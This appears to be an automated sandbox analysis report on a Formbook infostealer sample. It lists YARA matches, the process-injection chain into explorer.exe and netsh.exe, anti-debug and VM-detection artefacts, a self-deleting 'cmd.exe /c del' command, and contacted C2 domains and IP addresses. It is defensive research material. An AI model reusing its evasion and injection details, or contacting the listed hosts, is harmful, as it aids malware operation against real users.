          Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: jsqqecy.exe PID: 1236, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: jsqqecy.exe PID: 1224, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: netsh.exe PID: 6140, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\2022-571-GLS.exe | Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\2022-571-GLS.exe | Code function: 0_2_00406333
          Source: C:\Users\user\Desktop\2022-571-GLS.exe | Code function: 0_2_00404936
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 1_2_00BC18D0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 1_2_00BDAA0A
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 1_2_00BCC520
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 1_2_00BC3540
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 1_2_00BC8ED0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_0041F007
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_00401208
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_0041DC7B
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_0041ED47
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_00402D88
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_00409E5C
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_00409E60
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_0041EE6F
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_0041D6F5
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_0041DFEF
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_00BC18D0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_00BDAA0A
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_00BCC520
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_00BC3540
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_00BC8ED0
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: String function: 00BCD960 appears 64 times
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: String function: 00BD25D4 appears 36 times
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_0041A360 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_0041A410 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_0041A490 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_0041A35A NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_0041A40A NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_0041A48C NtClose,
          Source: 2022-571-GLS.exe | ReversingLabs: Detection: 30%
          Source: C:\Users\user\Desktop\2022-571-GLS.exe | File read: C:\Users\user\Desktop\2022-571-GLS.exe
          Source: 2022-571-GLS.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\2022-571-GLS.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\2022-571-GLS.exe C:\Users\user\Desktop\2022-571-GLS.exe
          Source: C:\Users\user\Desktop\2022-571-GLS.exe | Process created: C:\Users\user\AppData\Local\Temp\jsqqecy.exe "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Process created: C:\Users\user\AppData\Local\Temp\jsqqecy.exe "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
          Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\jsqqecy.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\2022-571-GLS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\2022-571-GLS.exe | File created: C:\Users\user\AppData\Local\Temp\nst2735.tmp
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@9/4@3/3
          Source: C:\Users\user\Desktop\2022-571-GLS.exe | Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\2022-571-GLS.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\2022-571-GLS.exe | Code function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Command line argument: --headless
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Command line argument: --unix
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Command line argument: --width
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Command line argument: --height
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Command line argument: --signal
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Command line argument: --server
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --headless
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --unix
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --width
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --height
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --signal
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCommand line argument: --server
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: netsh.pdb source: jsqqecy.exe, 00000002.00000002.381171915.0000000001119000.00000004.00000020.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.383264606.0000000003200000.00000040.10000000.00040000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381214615.0000000001131000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: jsqqecy.exe, 00000001.00000003.299119725.00000000029C0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000001.00000003.299523428.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000003.303967054.0000000001217000.00000004.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381584152.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.382622757.00000000014CF000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.382550493.0000000003384000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.380856964.00000000031ED000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563303711.0000000003520000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563833806.000000000363F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: jsqqecy.exe, 00000002.00000002.381171915.0000000001119000.00000004.00000020.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.383264606.0000000003200000.00000040.10000000.00040000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381214615.0000000001131000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: jsqqecy.exe, 00000001.00000003.299119725.00000000029C0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000001.00000003.299523428.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000003.303967054.0000000001217000.00000004.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381584152.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.382622757.00000000014CF000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.382550493.0000000003384000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.380856964.00000000031ED000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563303711.0000000003520000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563833806.000000000363F000.00000040.00000800.00020000.00000000.sdmp
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 1_2_00BD5A75 push ecx; ret
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_0041D05E push cs; ret
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_0041681D push 99159BFBh; iretd
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_00417829 push esp; retf
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_00416C89 push es; ret
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_0041D4B5 push eax; ret
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_0041D56C push eax; ret
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_0041D502 push eax; ret
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_0041D50B push eax; ret
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_0040674B push esi; iretd
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_00BD5A75 push ecx; ret
          [Source: jsqqecy.exe.0.dr] Static PE information: section name: .00cfg
          [Source: jsqqecy.exe.0.dr] Static PE information: section name: .voltbl
          [Source: C:\Users\user\Desktop\2022-571-GLS.exe] File created: C:\Users\user\AppData\Local\Temp\jsqqecy.exe

          Hooking and other Techniques for Hiding and Protection

          [Source: explorer.exe] User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xE5
          [Source: C:\Users\user\Desktop\2022-571-GLS.exe] Process information set: NOOPENFILEERRORBOX
          [Source: C:\Windows\explorer.exe] Process information set: NOOPENFILEERRORBOX
          [Source: C:\Windows\explorer.exe] Process information set: NOOPENFILEERRORBOX
          [Source: C:\Windows\SysWOW64\netsh.exe] Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          [Source: C:\Windows\SysWOW64\netsh.exe] RDTSC instruction interceptor: First address: 0000000002939904 second address: 000000000293990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          [Source: C:\Windows\SysWOW64\netsh.exe] RDTSC instruction interceptor: First address: 0000000002939B7E second address: 0000000002939B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          [Source: C:\Windows\explorer.exe TID: 3156] Thread sleep time: -50000s >= -30000s
          [Source: C:\Windows\SysWOW64\netsh.exe TID: 6032] Thread sleep time: -38000s >= -30000s
          [Source: C:\Windows\explorer.exe] Last function: Thread delayed
          [Source: C:\Windows\explorer.exe] Last function: Thread delayed
          [Source: C:\Windows\SysWOW64\netsh.exe] Last function: Thread delayed
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_00409AB0 rdtsc
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] API coverage: 2.2 %
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] API coverage: 2.2 %
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Process information queried: ProcessInformation
          [Source: C:\Users\user\Desktop\2022-571-GLS.exe] Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          [Source: C:\Users\user\Desktop\2022-571-GLS.exe] Code function: 0_2_00405FF6 FindFirstFileA,FindClose,
          [Source: C:\Users\user\Desktop\2022-571-GLS.exe] Code function: 0_2_00402654 FindFirstFileA,
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 1_2_00BD52F3 FindFirstFileExW,
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 1_2_00BD53A7 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_00BD52F3 FindFirstFileExW,
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_00BD53A7 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
          [Source: C:\Users\user\Desktop\2022-571-GLS.exe] API call chain: ExitProcess graph end node
          [Source: explorer.exe, 00000003.00000000.366063254.000000000834F000.00000004.00000001.00020000.00000000.sdmp] Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
          [Source: explorer.exe, 00000003.00000000.365236364.000000000830B000.00000004.00000001.00020000.00000000.sdmp] Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          [Source: explorer.exe, 00000003.00000000.342989666.00000000059F0000.00000004.00000001.00020000.00000000.sdmp] Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
          [Source: explorer.exe, 00000003.00000000.366769523.0000000008394000.00000004.00000001.00020000.00000000.sdmp] Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          [Source: explorer.exe, 00000003.00000000.351146407.000000000CDC8000.00000004.00000001.00020000.00000000.sdmp] Binary or memory string: _VMware_SATA_CD00#5&
          [Source: explorer.exe, 00000003.00000000.365236364.000000000830B000.00000004.00000001.00020000.00000000.sdmp] Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 1_2_00BD383A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 1_2_00BD25EB GetProcessHeap,
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_00409AB0 rdtsc
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Process token adjusted: Debug
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 1_2_00BD00FE mov ecx, dword ptr fs:[00000030h]
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 1_2_00BD41ED mov eax, dword ptr fs:[00000030h]
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_00BD00FE mov ecx, dword ptr fs:[00000030h]
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_00BD41ED mov eax, dword ptr fs:[00000030h]
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Process queried: DebugPort
          [Source: C:\Windows\SysWOW64\netsh.exe] Process queried: DebugPort
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_0040ACF0 LdrLoadDll,
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 1_2_00BCD780 SetUnhandledExceptionFilter,
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 1_2_00BD383A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 1_2_00BCDC8D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 1_2_00BCD78C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_00BD383A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_00BCDC8D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_00BCD78C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 2_2_00BCD780 SetUnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          [Source: C:\Windows\explorer.exe] Domain query: www.easyentry.vip
          [Source: C:\Windows\explorer.exe] Network Connect: 34.117.168.233 80
          [Source: C:\Windows\explorer.exe] Network Connect: 45.221.114.43 80
          [Source: C:\Windows\explorer.exe] Domain query: www.cdlcapitolsolutions.com
          [Source: C:\Windows\explorer.exe] Network Connect: 75.2.81.221 80
          [Source: C:\Windows\explorer.exe] Domain query: www.fulili.com
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\jsqqecy.exe protection: execute and read and write
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          [Source: C:\Windows\SysWOW64\netsh.exe] Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          [Source: C:\Windows\SysWOW64\netsh.exe] Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Thread APC queued: target process: C:\Windows\explorer.exe
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Thread register set: target process: 3528
          [Source: C:\Windows\SysWOW64\netsh.exe] Thread register set: target process: 3528
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Process created: C:\Users\user\AppData\Local\Temp\jsqqecy.exe "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up
          [Source: C:\Windows\SysWOW64\netsh.exe] Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\jsqqecy.exe"
          [Source: explorer.exe, 00000003.00000000.358106625.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.339007760.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.306844469.0000000000E50000.00000002.00000001.00040000.00000000.sdmp] Binary or memory string: EProgram Managerzx
          [Source: explorer.exe, 00000003.00000000.348541007.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.363020980.0000000005C70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.358106625.0000000000E50000.00000002.00000001.00040000.00000000.sdmp] Binary or memory string: Shell_TrayWnd
          [Source: explorer.exe, 00000003.00000000.358106625.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.339007760.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.306844469.0000000000E50000.00000002.00000001.00040000.00000000.sdmp] Binary or memory string: Progman
          [Source: explorer.exe, 00000003.00000000.338725850.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.306396985.00000000009C8000.00000004.00000020.00020000.00000000.sdmp] Binary or memory string: Progmanath
          [Source: explorer.exe, 00000003.00000000.358106625.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.339007760.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.306844469.0000000000E50000.00000002.00000001.00040000.00000000.sdmp] Binary or memory string: Progmanlock
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 1_2_00BCD9A5 cpuid
          [Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe] Code function: 1_2_00BCD632 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          [Source: C:\Users\user\Desktop\2022-571-GLS.exe] Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Lowering of HIPS / PFW / Operating System Security Settings

          [Source: C:\Windows\explorer.exe] Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

          Stealing of Sensitive Information

          [Source: Yara match] File source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPE
          [Source: Yara match] File source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          [Source: Yara match] File source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPE
